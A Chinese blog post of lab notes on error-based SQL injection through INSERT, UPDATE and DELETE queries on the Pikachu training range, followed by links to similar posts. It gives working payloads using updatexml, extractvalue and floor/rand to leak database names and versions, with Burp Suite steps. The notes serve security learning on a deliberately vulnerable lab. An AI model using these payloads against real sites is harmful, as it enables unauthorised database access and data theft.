基于insert update delete的注入利用案

最新推荐文章于 2024-03-02 03:23:15 发布
最新推荐文章于 2024-03-02 03:23:15 发布
阅读量218 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45680080/article/details/102875725
版权

Insert注入
前端注册信息会被后台通过insert这个操作将信息插入到数据库里,前端输入可直接拼接到insert相关操作里,形成一个insert注入。

基于insert下的报错
在后端数据库member表格里插入一个用户——第五行mysql>写入 insert into member(username,pw,sex,ponenum,email,address)values(‘xiaohong’,111111,1,2,3,4);(1,2,3,4)这些字段也可用别的字段代替。——回车提交这个正常的插入——第四行mysql>写入 select* from menber;回车——构造闭合——在接下来的mysql> insert into member(username,pw,sex,phoneum,email,address) values(‘1’ or(这里是一个表达式)or’ ‘,111111,1,2,3,4);——表达式的插入基于insert下的报错xiaohong’ or updatexml(1,concat( 0x7e,database()),0) or ‘(该语句插入后SQL语句在执行的时候会用or的逻辑运算对第一个插入的值进行运算)—— updatexml(1,concat( 0x7e,database()),0插入——形成语句mysql> insert into member(username,pw,sex,phoneum,email,address) values(‘1’ or updatexml(1,concat( 0x7e,database()),0) or’’,111111,1,2,3,4);点击回车——显示出datebases执行结果

操作:
pikachu平台"insert/update"注入——用户一栏输入xiaohong’ or updatexml(1,concat( 0x7e,database()),0) or ‘,昵称随便填一个提交——得到报错——与Sql-Inject基于函数的报错一样只需要将database()函数换成别的函数名,即可得到想要了解数据的信息得到报错
基于update下的报错
在pikachu里"insert/update"注入中登录
页面username一栏输入xiaohong’ or updatexml(1,concat( 0x7e,database()),0) or '——点击提交得到报错信息以及数据库名称。

基于delete的报错
在pikachu"的delete"注入里点击删除留言——在burp suite里proxy找到该删除留言请求——将该请求发送到repeater——在后台,直接将id获取到之后拼接到sql里面去——构造闭合——将1 or updatexml(1,concat(0x7e,database()),0)放入burp suite上拼接到id=后面构成完整的URL——选择该语句右键将其通过URL-encode key characters转化成合法的拼接——返回数据最下面查看报错信息——将数据库名称返回
删除留言
burp suite请求抓包发送
初始信息
插入语句
得到所需数据资料
基于extract value下的报错

extract value)函数作用:从目标XML中返回包含所查询值的字符串。
语法: ExtractValue(xml_document, xpath_string)
第一个参数对xml进行操作的函数,对指定的内容进行查询
第二个参数xpath_string去定位所要查询的字符串
函数的作用。
第一个参数: XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数: XPath_string (格式的字符串)
Xpath定位必须是有效的,否则则会发生错误
去构造
得到错误可以把表达式拼进去将表达式的结果作为错误的内容返回来。
操作:在pikachu里的字符型注入查询栏输 kobe’ and extractvalue (0,concat(0x7e,version()))#——得到一个报错显示出数据库的版本
在这里插入图片描述

基于floor的报错
说明:数据库第五行mysql>输入 select floor(1111.1111)回车——得到前面的整数部分,将小数点后面的部分去掉
该函数能够运行要有下面三个函数(加黑字体)kobe’ and (select 2 from (select count(*), concat(version( ), floor (rand(0)2))x from information_schema.tables group by x) a)#
(floor去取rand生成的整数部分将其于version生成的结果进行拼接
操作:pikachu里字符型注入输入kobe’ and (select 2 from (select count(), concat(version( ), floor (rand(0)*2))x from information_schema.tables group by x) a)#——得到报错结果——显示数据库的版本(其中version()可代替成其它你想查找的表达式
在这里插入图片描述

Oliveabercrombie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于insert update delete注入
qq_43814486的博客
04-04 890
inset注入原理: 所谓inset注入就是指我们前端注册的信息会被后台通过insert操作插入到数据库里边去,若此时后台没有做出相应的处理就会构成insert注入。 ...
【pikachu-SQL】delete注入,2022,超详细
weixin_46497491的博客
09-12 1391
个人理解显错注入原理:updatexml()第二位是xpath,显错注入的根本就是使用xpath不能识别的符号来进行报错,显示查询语句。此处因为有多个表名,所以需要limit来限制,limit 3,1:3代表从第几个表开始,1代表显示1个,此处出现了我们需要的users表即可。这个地方,因为显错注入最多只能显示32个字符,所以我们需要使用substring函数来控制一下,显示出未显示的结果,拼接在一起就可以了。1、在留言板处,尝试注入,发现无论输入什么都会显示在留言板下方,不是固定的注入点。
一文了解pikachu的SQL注入
allintao的博客
03-01 2689
本文章主要讲解关于pikachu的注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
安全小白的pikachu靶场学习笔记(三)---sql注入(II)
m0_46103905的博客
08-21 409
本篇文章将会针对pikachu靶场中的其它sql注入环节进行分析讲解通过这篇文章,你也许会学到更多的sql注入的位置、方式,重点是基于函数报错的方式注入,还有盲注的思想。提示:以下是本篇文章正文内容,下面例可供参考。
pikachu SQL注入delete
ANYOUZHEN的博客
05-10 494
基于delete下的报错: 由于后台未对传进来的id进行处理,导致del注入 构造payload: 由于是id,我们不需要对1进行闭合 1 or updatexml(1,concat(0x7e,database()),0) 将id=73修改为1 or updatexml(1,concat(0x7e,database()),0),并通过url进行编码 点击send,拉到最底下 ...
二、pikachu之SQL注入(2)
qq_55202378的博客
08-22 223
SQL注入
yii框架builder、updatedelete使用方法
10-26
本篇将详细介绍Yii框架中的`builder`、`update`和`delete`方法的使用。 1. Query Builder: Query Builder允许开发者通过面向对象的方式来构建SQL查询,无需直接编写原始的SQL语句。它通过一系列的方法调用来创建...
NoIOCFramework(005控制台动态实例UnitOfWork调用模式,完成InsertUpdateDelete数据操作验证).rar
12-18
本篇文章将详细解析一个名为"NoIOCFramework"的项目,特别是其中的控制台应用如何利用UnitOfWork模式进行数据操作的验证,包括InsertUpdateDelete三大基本操作。 首先,让我们理解一下标题中的关键概念。...
2019-12-12_NoIOCFramework(001控制台常规调用,完成InsertUpdateDelete数据操作验证).rar
12-12
这个教程可能展示了如何通过控制台应用程序来演示DI的基本原理,比如使用构造函数注入来传递数据库连接对象,从而完成InsertUpdateDelete数据操作。 具体到这个项目,"2019-12-12_NoIOCFramework(001控制台常规...
2019-12-20_NoIOCCore(001控制台动态实例UnitOfWork调用模式,完成InsertUpdateDelete数据操作验证)
12-20
标题中的“2019-12-20_NoIOCCore(001控制台动态实例UnitOfWork调用模式,完成InsertUpdateDelete数据操作验证)”表明这是一个关于使用无接口依赖注入(No-IOC)核心的代码示例,具体是在2019年12月20日创建的。...
2019-12-18_NoIOCFramework(004控制台动态实例Repository调用模式,完成InsertUpdateDelete数据操作验证)
12-18
本主题将深入探讨"2019-12-18_NoIOCFramework(004控制台动态实例Repository调用模式,完成InsertUpdateDelete数据操作验证)"项目中的关键知识点,包括Repository模式、依赖注入以及控制台应用程序中的动态实例化...
Pikachu靶场 “delete”SQL注入
感谢关注
12-24 536
随便写一个留言“hello”,输入下面的命令,再输入。要选中代码,右键,点击。,就能变成上面的那样。
pikachu的delete注入
weixin_50339082的博客
06-15 999
pikachu的delete注入 基于delete下的报错 删除的时候设置代理,抓包。 将其发送到Repeater,然后改包,将id后面的数字改掉,由于是get的类型的 在payload记得进行url编码 payload: or updatexml(2,concat(0x7e,(database())),0) 编码之后,可以看到空格变为了加号,点击Send,得到数据库pikachu。 ...
pikachu之特殊注入之搜索型注入、xx型注入insert/update注入delete注入、宽字节注入
最新发布
2301_80661529的博客
03-02 1263
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
pikachu靶场(sql注入)(delete和http头部注入和盲注)
weixin_54431413的博客
03-16 3679
pikachu的盲注,delete和http头部注入
PiKachu之Sql (SQL注入)通关 2022
av11566的博客
04-18 8204
遇到一个待测点: 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面显示结果。 2)输入的SQL语句是否能报错-能通过数据库的报错,看到数据库的一些语句痕迹(select username, password from user where id = 4 and 0#3)输入的SQL语句能否不报错-我们的语句能够成功闭合 2、什么类型的注入 3、语句是否能够被恶意修改--第二个要素 4、是否能够成功执行-->第三个要素 5、获取我们想要的数据。
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2973
sql注入
基于insert/update/delete注入
北冥有鱼
03-31 7163
之前的数字型,字符型,搜索型,都是通过selecte进行的一个操作,如果是insert/update/delete 需要一个怎样的操作呢 我们直接通过pikachu上的靶场来看一下 这边有一个注册按钮,点一下注册 还是老方法,用单引号确认是否存在注入点 发现返回了错误,说明这里是存在注入点的,我们知道这个地方的后端是用的insert,怎么样利用insert来进行操作呢? 这个地方正常来...
基于insert update delete注入利用
qq_45721814的博客
11-10 167
1、先打开pikachu平台,我们之前的所有破解都是select操作的,我们接下来利用insert方法来利用漏洞,那么insert漏洞是什么呢,就是你在前端输入的错误信息会被拼接到后端的insert操作里面去,那么我们可以试一下随便输入一些信息发现它会报错就说明我们的信息是拼接到后端insert操作中的 2、我们可以在数据库中演示insert的操作方法,先自己写一个用户名和密码 然后我们来看一下...
sql注入时回显return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
10-22
在这个引用中,回显信息是通过preg_match()函数来检测关键字,如果检测到了select、updatedelete、drop、insert、where或者.等关键字,就会被过滤掉,从而防止SQL注入攻击。但是,攻击者可以通过联合查询等方式来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值